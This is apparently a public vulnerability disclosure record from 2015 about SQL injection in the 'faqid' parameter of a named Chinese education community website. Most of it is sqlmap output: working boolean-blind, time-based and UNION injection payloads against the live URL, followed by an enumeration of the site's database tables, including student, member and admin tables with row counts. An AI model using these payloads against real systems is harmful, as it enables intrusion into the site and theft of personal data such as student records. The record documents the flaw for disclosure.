2015-12-11: Details reported to the vendor; awaiting vendor response
2015-12-16: The vendor chose to ignore the vulnerability; details disclosed to the public
http://community.edufe.com.cn/faq/index.php?faqid=26
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: faqid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: faqid=26 AND 1465=1465

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: faqid=26 AND (SELECT * FROM (SELECT(SLEEP(5)))izHA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: faqid=26 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7071,0x4550524a625963476477,0x716a6a7671),NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: PHP 5.2.6, Nginx
back-end DBMS: MySQL 5.0.12
Database: cc_phpcms
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| phpcms_ads_stat            | 256361  |
| activity_registerinfo      | 231938  |
| student                    | 152303  |
| activity_responsibility    | 150774  |
| phpcms_keyword             | 63697   |
| edufe_search               | 23252   |
| phpcms_log                 | 18881   |
| phpcms_hits                | 18230   |
| activity_assesslog         | 17585   |
| phpcms_content_tag         | 15491   |
| activity_log               | 14764   |
| phpcms_cache_count         | 13738   |
| phpcms_content_count       | 11664   |
| phpcms_c_news              | 11654   |
| phpcms_content             | 11650   |
| phpcms_attachment          | 8236    |
| post_temp                  | 2076    |
| activity_productappr       | 2039    |
| activity_product           | 2020    |
| phpcms_space_article       | 1893    |
| phpcms_space_comment       | 1807    |
| phpcms_member_info         | 982     |
| phpcms_member              | 979     |
| phpcms_member_detail       | 963     |
| phpcms_comment             | 880     |
| phpcms_copyfrom            | 528     |
| activity_tag               | 434     |
| phpcms_content_position    | 407     |
| phpcms_member_group_priv   | 393     |
| phpcms_space_blog          | 304     |
| phpcms_menu                | 273     |
| phpcms_space_photo         | 251     |
| phpcms_admin_role_priv     | 159     |
| phpcms_model_field         | 131     |
| phpcms_message             | 130     |
| phpcms_session             | 92      |
| phpcms_vote_option         | 84      |
| phpcms_vote_useroption     | 63      |
| phpcms_area                | 59      |
| phpcms_vote_data           | 58      |
| activity_prodjudge         | 27      |
| phpcms_vote_subject        | 27      |
| phpcms_avatars             | 24      |
| phpcms_space_type          | 24      |
| activity_itemprize         | 22      |
| phpcms_author              | 22      |
| magazine_image             | 21      |
| phpcms_category            | 21      |
| phpcms_process_status      | 21      |
| magazine_article           | 19      |
| activity_itemmanager       | 18      |
| phpcms_space_album         | 18      |
| activity_affiche           | 17      |
| phpcms_faq                 | 17      |
| phpcms_space_ctype         | 16      |
| phpcms_search              | 15      |
| phpcms_module              | 13      |
| phpcms_space_template      | 12      |
| phpcms_urlrule             | 12      |
| phpcms_admin_role          | 11      |
| phpcms_space_photo_comment | 11      |
| phpcms_space_position      | 11      |
| phpcms_admin               | 10      |
| phpcms_block               | 10      |
| phpcms_status              | 9       |
| activity_set               | 7       |
| phpcms_member_group        | 6       |
| phpcms_model               | 6       |
| phpcms_process             | 6       |
| phpcms_role                | 6       |
| phpcms_position            | 5       |
| magazine_info              | 4       |
| phpcms_link                | 4       |
| phpcms_type                | 4       |
| activity_productstate      | 3       |
| activity_userrole          | 3       |
| phpcms_ads                 | 3       |
| phpcms_search_type         | 3       |
| phpcms_workflow            | 3       |
| activity_itemtype          | 2       |
| phpcms_ads_place           | 2       |
| phpcms_datasource          | 2       |
| phpcms_space               | 2       |
| phpcms_space_api           | 2       |
| activity_filetcomm         | 1       |
| magazine_type              | 1       |
| phpcms_editor_data         | 1       |
| search_counter             | 1       |
+----------------------------+---------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-16 11:18
Vulnerability Rank: 4 (WooYun rating)
None yet